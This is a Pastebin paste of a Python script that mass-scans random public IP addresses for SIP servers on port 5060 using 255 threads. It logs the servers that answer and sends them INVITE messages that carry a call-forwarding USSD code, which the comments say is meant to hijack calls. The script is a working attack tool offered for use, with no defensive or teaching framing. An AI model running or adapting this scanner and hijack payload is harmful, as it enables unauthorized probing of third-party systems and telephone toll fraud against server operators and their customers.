Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import socket
- import random
- import select
- import threading
- import time
- #IP data
- servip="9.39.195.80" #reuse ipaddr for target sip server in order to hijack
- myip="70.67.16.106"
- port=5060
- #INVITE data
- name="James"
- nameto="Herbert"
- phoneno="*61*16043308323#" #hijack via call forwarding USSD code
- #REGISTER data
- enableregister=0 #enable registering but most sefvers nolonger support it
- username="SELFCHECK" #default username
- realm="asterisk" # default www authentication realm
- #SIP data
- sipdata="v=0\no="+nameto+" PHONENO PHONENO IN IP4 MYIP\ns=-\nc=IN IP4 MYIP\nt=0 0\nm=audio 49172 RTP/AVP 0\na=rtpmap:0 PCMU/8000\nport="+str(port)
- #timeout and rate limiting options
- timeout=0.3 #370 ms timeout
- ratelimit=0
- def findReplace(data, ip):
- return data.replace("SIPDATA", sipdata).replace("PHONENO", phoneno).replace("MYIP", myip).replace("SERVIP", servip).replace("IPADDR", ip).replace("PHONENO", phoneno).replace("CONTLEN", str(len(sipdata))).replace("PORT", str(port)).replace("NAME", name).replace("NAMTO", nameto).replace("USER", username).replace("REALM" ,realm)
- sipdata=findReplace(sipdata, servip)
- #open sip data file for reading
- f=open("/sdcard/SIPSCAN1.txt", "r")
- fdata1=f.read()
- f.close()
- f=open("/sdcard/SIPSCAN2.txt", "r")
- fdata2=f.read()
- f.close()
- s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
- s.bind(("", port))
- def recvDatShiz(s):
- try:
- s.setblocking(0)
- ready = select.select([s], [], [], timeout)
- if ready[0]:
- data, addr = s.recvfrom(4096)
- return data, addr
- except:
- pass
- return b'', '0.0.0.0'
- def dataCheck(data, ip):
- if data!=b'':
- if b"100 " in data or b"200 " in data or b"180 " in data: # check for auth or ringing
- print(data)
- print(ip)
- f=open("/sdcard/sip.txt", "a")
- f.write(ip+"\n")
- f.close()
- return data
- def scanThread(fdata1, fdata2):
- while 1:
- ip=str(random.randrange(1,223))+"."+str(random.randrange(0,255))+"."+str(random.randrange(0,255))+"."+str(random.randrange(0,255))
- if ip.startswith("0") or ip.startswith("127") or ip.startswith("192") or ip.startswith("172") or ip.startswith("10."):
- continue
- try:
- if enableregister:
- s.sendto(findReplace(fdata1, ip).encode(), (ip, port))
- data, addr = recvDatShiz(s)
- if b"Unauthorized" in data or b"Illegal" in data or b"404" in data or "480" in data or data==b'':
- continue
- dataCheck(data, ip)
- s.sendto(findReplace(fdata2, ip).encode(), (ip, port))
- data, addr = recvDatShiz(s)
- #if data!=b"":
- # print(data)
- if b"Unauthorized" in data or b"Illegal" in data or b"404" in data or b"480" in data or data==b'':
- continue
- dataCheck(data, ip)
- except Exception as e:
- #print(str(e))
- continue
- time.sleep(ratelimit)
- for i in range(0, 255):
- threading.Thread(target=scanThread, args=(fdata1,fdata2,)).start()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement